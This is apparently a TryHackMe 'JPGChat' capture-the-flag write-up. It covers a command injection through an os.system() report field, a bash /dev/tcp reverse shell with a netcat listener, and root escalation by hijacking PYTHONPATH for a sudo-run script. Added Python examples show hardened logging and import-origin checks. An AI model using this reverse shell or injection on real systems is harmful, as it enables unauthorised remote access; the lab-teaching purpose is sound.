JPGChat: TryHackMe Writeup

Difficulty: Easy

https://tryhackme.com/room/jpgchat

Deploy the machine, make sure you are connected to VPN.

Start with scanning the IP using Nmap:

nmap -sV -Pn <machine IP>

Let’s get the source code from the admin’s GitHub, which the scan output points us to:

These are the links we found; let’s follow them and grab the code:

In the code, we can see that “os.system()” is used to echo the “[REPORT]” input to a text file. The input is inserted with “%s” and there is NO sanitization of user input, so we can exploit this:
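To make the root cause concrete, here is an added example (my own code, not the room’s actual source) of the same pattern: user-supplied text %-formatted straight into a shell command string, next to a hardened version that checks the name against an allowlist and appends to the report file with plain file I/O, so no shell is ever spawned. The report file path is an assumed demo location in the temp directory.

```python
import re
import tempfile
from pathlib import Path

# Assumed demo location; the room's real report file path is not reproduced here.
REPORT_PATH = Path(tempfile.gettempdir()) / "jpgchat_reports_demo.txt"


def build_vulnerable_command(name: str, report_path: Path = REPORT_PATH) -> str:
    """Reproduces the unsafe pattern: the user's text is %-formatted into a
    shell command string. It is only returned, never executed, so the effect
    of a ';' in the name can be inspected without running anything."""
    return "echo [REPORT] from %s >> %s" % (name, report_path)


# Allowlist: one short token of letters, digits, '_', '.', '-'; nothing else.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def is_safe_name(name: str) -> bool:
    """True only if the name contains no whitespace or shell metacharacters."""
    return bool(NAME_RE.fullmatch(name))


def log_report_safe(name: str, message: str, report_path: Path = REPORT_PATH) -> str:
    """Hardened version: validate the name, then write with file I/O.
    Because no shell interprets the text, ';', '|', '$()' and friends are inert."""
    if not is_safe_name(name):
        raise ValueError("rejected report name: %r" % name)
    # Keep each record on one line so a newline in the message cannot forge entries.
    clean_message = message.replace("\r", "").replace("\n", "\\n")
    line = "[REPORT] from %s: %s\n" % (name, clean_message)
    with report_path.open("a", encoding="utf-8") as fh:
        fh.write(line)
    return line


def read_reports(report_path: Path = REPORT_PATH) -> list:
    """Return the logged report lines (empty if nothing has been written yet)."""
    if not report_path.exists():
        return []
    return report_path.read_text(encoding="utf-8").splitlines()


if __name__ == "__main__":
    hostile = "wes; id"  # constructed input: a name followed by a second command
    print("unsafe command string:", build_vulnerable_command(hostile))
    print("allowlist accepts it? ", is_safe_name(hostile))
    print("safe logger wrote:    ", log_report_safe("wes", "hello"), end="")
```

The key difference is not escaping but architecture: the hardened path never hands user text to a shell at all, and the allowlist rejects anything that is not a plain name before it is stored. If an external program were genuinely required, the same rule applies: pass an argv list to subprocess.run with shell=False rather than building a command string.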

Let’s first connect to the chat:

nc <machine IP> 3000

Type [REPORT] and press Enter; it will ask for a name. Enter a name, then a semicolon (;), and then our reverse shell:

bash -i >& /dev/tcp/<listener IP>/<port> 0>&1;

Meanwhile, start a Netcat listener on our machine on the same port: nc -lvnp <port>

Go to the /home/wes directory, where we find our first flag, user.txt.

Let’s check what we can run with sudo -l:

Now cat the test_module.py file:

Here it imports the compare module and then runs a print command. Since we can’t change test_module.py, we will create a compare.py file of our own with the following contents.

Now export PYTHONPATH so it includes the directory containing our compare.py, then run the command from sudo -l.
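The escalation works because Python searches PYTHONPATH entries before site-packages, and sudo let that variable through (it only does so when env_reset is disabled, PYTHONPATH is listed in env_keep, or the rule carries the SETENV tag). As an added example (my own code, not the room’s files), the check below resolves which compare.py would actually be imported for a given search order and flags the case where the module is missing from, or resolves outside, the trusted application directory. All directories and files are constructed in a temp folder.

```python
import importlib.machinery
import tempfile
from pathlib import Path


def resolve_module_origin(module_name: str, search_path: list) -> str:
    """Return the file Python would import for module_name using the given
    search order (same first-match rule as sys.path), or "" if not found."""
    spec = importlib.machinery.PathFinder.find_spec(module_name, search_path)
    if spec is None or spec.origin is None:
        return ""
    return str(Path(spec.origin).resolve())


def check_module_trusted(module_name: str, trusted_dir: Path, search_path: list) -> bool:
    """True only if the module that would really be imported lives under trusted_dir."""
    origin = resolve_module_origin(module_name, search_path)
    if not origin:
        return False  # a missing module means the script would fail open to PYTHONPATH
    try:
        Path(origin).relative_to(trusted_dir.resolve())
        return True
    except ValueError:
        return False


def build_demo_dirs() -> tuple:
    """Constructed fixture (not the room's layout):
    - app_missing:  the privileged script's directory with NO compare.py (as in the room)
    - app_complete: the same directory with its own compare.py shipped alongside
    - untrusted:    a writable directory that a PYTHONPATH export could point at"""
    base = Path(tempfile.mkdtemp(prefix="jpgchat_demo_"))
    app_missing = base / "app_missing"
    app_complete = base / "app_complete"
    untrusted = base / "untrusted"
    for d in (app_missing, app_complete, untrusted):
        d.mkdir()
    (app_complete / "compare.py").write_text("def compare(a, b):\n    return a == b\n")
    (untrusted / "compare.py").write_text("# same module name, different location\n")
    return app_missing, app_complete, untrusted


APP_DIR_MISSING, APP_DIR_COMPLETE, UNTRUSTED_DIR = build_demo_dirs()


def simulate_run(script_dir: Path, pythonpath_entries: list) -> dict:
    """Model the search order a script sees: its own directory first (sys.path[0]),
    then whatever PYTHONPATH contributed."""
    search = [str(script_dir)] + [str(p) for p in pythonpath_entries]
    return {
        "origin": resolve_module_origin("compare", search),
        "trusted": check_module_trusted("compare", script_dir, search),
    }


if __name__ == "__main__":
    print("no PYTHONPATH, compare.py missing:", simulate_run(APP_DIR_MISSING, []))
    print("PYTHONPATH set, compare.py missing:", simulate_run(APP_DIR_MISSING, [UNTRUSTED_DIR]))
    print("PYTHONPATH set, compare.py shipped:", simulate_run(APP_DIR_COMPLETE, [UNTRUSTED_DIR]))
```

Two things fall out of the three runs: the script's own directory is searched before PYTHONPATH, so shipping compare.py next to the root-owned script closes the hole regardless of the environment; and the durable fix on the sudo side is to keep env_reset and not grant SETENV or env_keep PYTHONPATH for a rule that runs an interpreter.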

And there we have the last flag, root.txt.

Happy Hacking!

Cyber Security Enthusiast | Writeups Writer | CTF player